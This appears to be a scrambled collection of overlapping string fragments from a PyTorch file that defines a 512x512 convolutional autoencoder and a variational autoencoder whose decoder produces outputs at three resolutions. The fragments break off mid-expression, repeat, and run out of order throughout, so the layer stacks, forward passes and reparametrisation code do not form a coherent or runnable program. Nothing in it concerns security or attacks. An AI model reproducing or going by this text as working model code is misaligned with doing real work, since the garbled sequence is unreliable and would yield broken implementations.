bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size", "1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16) x 16 x16", "* 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32", "4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8)", "inplace=True), # state size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16, nef", "self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x)", "* 64), nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf *", "self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x))", "nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), #", "VAE # state size. (nc) x 512 x 512 ) self.output_layer = nn.Tanh()", "4 x 4 nn.Conv2d(nef * 64, nef * 128, 4, 1, 0, bias=False),", "nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True),", "*128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128", "(nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input):", "size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1,", "state size. (nef*8) x 32 x 32 nn.Conv2d(nef*8, nef * 16, 4, 2,", "inplace=True), # state size is (nef) x 256 x 256 nn.Conv2d(nef, nef *", "128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "* 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc,", "128, ngf * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), #", "mu, logvar): std = logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu)", "x 256 nn.Conv2d(nef, nef * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 2),", "32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "size. (ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf,", "= nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128),", "1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf,", "nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf * 64, 4,", "bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf", "* 32), nn.ReLU(True), # size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4,", "super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( # input", "x2 nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512, mu, logvar", "= self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 =", "out256, out512 \"\"\" VAE with three losses at three scales of the decoder", "# state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4,", "= nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3 =", "input is (nc) x 512 x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False),", "size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16, nef * 32, 4,", "64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4,", "= nn.Sequential( # input is (nc) x 512 x 512 nn.Conv2d(nc, nef, 4,", "self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( # input is (nc) x", "* 16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16 x 16 nn.Conv2d(nef", "from Param import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz", "2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf) x 256 x 256", "# state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf *", "inplace=True), # state size. (nef*32) x 8 x 8 nn.Conv2d(nef * 32, nef", "eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x =", "bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64,", "size. (ngf*4) x 64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf", "bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf", "size is (nef) x 256 x 256 nn.Conv2d(nef, nef * 2, 4, 2,", "size. (nef*4) x 64 x 64 nn.Conv2d(nef * 4, nef * 8, 4,", "# state size. (nef*4) x 64 x 64 nn.Conv2d(nef * 4, nef *", "2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x", "## ##### ## Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 ,", "size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2,", "nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True),", "nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size.", "\"\"\" VAE with three losses at three scales of the decoder \"\"\" class", "import torch import torch.nn as nn from torch.autograd import Variable from Param import", "# input is (nc) x 512 x 512 nn.Conv2d(nc, nef, 4, 2, 1,", "Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size, nz)", "nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x 8 x 8", "32), nn.ReLU(True), # size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2,", "nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4),", "* 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size.", "out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE with three losses at", "4, 2, 1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2)", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf) x 256 x", "state size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),", "Param import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc", "self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x))", "= input.shape[0] x = self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1 logvar = self.fc2(x)", "ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1, bias=False),", "size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2, 1,", "size. (nef*64) x 4 x 4 nn.Conv2d(nef * 64, nef * 128, 4,", "32 x 32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x x = self.decode3(z) out128", "2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf) x", "torch.autograd import Variable from Param import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc):", "nn.ReLU(True), # state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf *", "self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True),", "2, 1, bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x", "nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef", "nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu,", "(nef*8) x 32 x 32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1, bias=False),", "bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x 64 x", "nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is", "* 64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x 4 nn.Conv2d(nef", "= self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 =", "64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64 x4", "x 256 x 256 nn.Conv2d(nef, nef * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1,", "#nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz)", "x 4 nn.Conv2d(nef * 64, nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef", "128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128,", "* 64, nef * 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2,", "2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32,", "bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf),", "* 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False))", "x4 x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf", "nn.Conv2d(nef * 4, nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8),", ", 2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2", "1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x 32", "self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1,", "self.encode = nn.Sequential( # input is (nc) x 512 x 512 nn.Conv2d(nc, nef,", "ngf * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state", "x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1,", "2, 1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2) x", "x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x = self.encode(input)", "16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16 x 16 nn.Conv2d(nef *", "#fc3 #del x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256", "nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2) x 128 x 128", "32 x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),", "ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state", "size. (nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 =", "bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. (ngf*2) x 128 x 128", "input): x = self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x)", "x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x", "bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4,", "ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size", "512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x = self.encode(input) x", "= nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf,", "2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1,", "#nn.Sigmoid() def forward(self, input): x = self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x))", "* 8, ngf * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True))", "out128, out256, out512 \"\"\" VAE with three losses at three scales of the", "1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4", "* 64, ngf * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True),", "# size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False),", "state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4,", "three losses at three scales of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3):", "self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),", "nn.Sequential( # input is (nc) x 512 x 512 nn.Conv2d(nc, nef, 4, 2,", "b_size = input.shape[0] x = self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1 logvar =", "nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4) x 64 x 64 self.conv_layer128", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef *", "# size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf * 32, 4, 2,", "nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x 256 x 256 nn.Conv2d(nef, nef", "## Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1,", "nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf", "from torch.autograd import Variable from Param import nc, nz, device class Model512(nn.Module): def", "4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) #", "* 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x 32 x 32 nn.Conv2d(nef*8,", "= self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512, mu,", "4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x 64 x 64 nn.Conv2d(nef *", "#fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del", "= self.decode1(x) return out128, out256, out512 \"\"\" VAE with three losses at three", "nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x 4", "self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf *", "(ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2, 1,", "= self.fc3(z).reshape(-1, self.nz, 1, 1) #fc3 #del x x = self.decode3(z) out128 =", "self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256,", "bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc) x 512 x", "* 128, 4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef *", "nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3,", "Part ## self.encode = nn.Sequential( # input is (nc) x 512 x 512", "1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),", "4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size.", "logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size", "= nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), #", "# state size. (nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid()", "1) #fc3 #del x x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x)", "size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4,", "3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 = nn.Sequential(", "nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64),", "1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1 = nn.Sequential(", "(nc) x 512 x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2,", "state size. (ngf*4) x 64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4,", "4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64)", "1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2) x 128", "forward(self, input): x = self.encode(input) x = self.decode3(x) out128 = self.output_layer(self.conv_layer128(x)) x =", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. (ngf*2) x", "* 8), nn.ReLU(True), # state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf *", "(ngf*4) x 64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf *", "def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential(", "input): b_size = input.shape[0] x = self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1 logvar", "1, bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf", "* 4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True))", "* 32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x 8 x 8 nn.Conv2d(nef", "nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16,", "1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1,", "x2 x2 nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf", "nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2,", "x 8 x 8 nn.Conv2d(nef * 32, nef * 64, 4, 2, 1,", "bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc,", "bias=False), nn.BatchNorm2d(ngf * 32), nn.ReLU(True), # size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf *", "* 128, ngf * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True),", "16 x16 nn.ConvTranspose2d(ngf * 16, ngf * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf", "nn.Tanh() #nn.Sigmoid() def forward(self, input): x = self.encode(input) x = self.decode3(x) out128 =", "input.shape[0] x = self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1 logvar = self.fc2(x) #fc2", "nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True),", "nc, 3, 1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf *", "= self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128,", "VAE with three losses at three scales of the decoder \"\"\" class VAE_Model512(nn.Module):", "with three losses at three scales of the decoder \"\"\" class VAE_Model512(nn.Module): def", "* 16, ngf * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True),", "nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), #", "= self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE with three", "ngf*128 x2 x2 nn.ConvTranspose2d(ngf * 128, ngf * 64, 4, 2, 1, bias=False),", "Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0, bias=False),", "* 2), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2,", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1", "out512 \"\"\" VAE with three losses at three scales of the decoder \"\"\"", "class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode", "Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz, ngf *128 , 2, 1, 0,", "device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ##", "2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), # state size.", "* 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state", "0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size ngf*128 x2 x2 nn.ConvTranspose2d(ngf *", "state size. (nef*4) x 64 x 64 nn.Conv2d(nef * 4, nef * 8,", "1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf *", "256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for", "128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid() )", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x", "nn.ReLU(True), # size ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1,", "nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1,", "8, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8)", "0, bias=True), nn.Sigmoid() ) ## ##### ## Decoder Part ## self.decode3 = nn.Sequential(", "nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. (ngf*2) x 128 x 128 self.conv_layer256", "* 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. (ngf)", "64) self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu, logvar):", "self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu,", "256 x 256 nn.Conv2d(nef, nef * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "return eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size, nz) mu", "(nef*64) x 4 x 4 nn.Conv2d(nef * 64, nef * 128, 4, 1,", "bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x 32 x", "512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz,", "2), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef", "4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32)", "* 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state", "4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x", "1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf", "self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def reparametrize(self, mu, logvar): std", "3, 1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2,", "bias=True), nn.Sigmoid() ) ## ##### ## Decoder Part ## self.decode3 = nn.Sequential( nn.ConvTranspose2d(nz,", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x 32 x 32 nn.Conv2d(nef*8, nef *", "8, ngf * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) #", "= nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def reparametrize(self,", "inplace=True), # state size. (nef*64) x 4 x 4 nn.Conv2d(nef * 64, nef", "2, 1, bias=False), nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf", "ngf*32 x8 x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "bias=False), nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16 x", "ngf * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state", "bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False),", "2), nn.ReLU(True)) # state size. (ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential(", "nef * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), #", "* 2, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 2), nn.LeakyReLU(0.2, inplace=True), # state", "forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size, nz) mu = self.fc1(x) #fc1", "nn.ReLU(True)) # state size. (ngf*4) x 64 x 64 self.conv_layer128 = nn.Sequential( nn.ConvTranspose2d(ngf", "nn.Conv2d(nef * 16, nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32),", "(nef*32) x 8 x 8 nn.Conv2d(nef * 32, nef * 64, 4, 2,", "4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4)", "1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x 8", "eps.mul(std).add_(mu) def forward(self, input): b_size = input.shape[0] x = self.encode(input).view(b_size, nz) mu =", "x 32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1, bias=False), 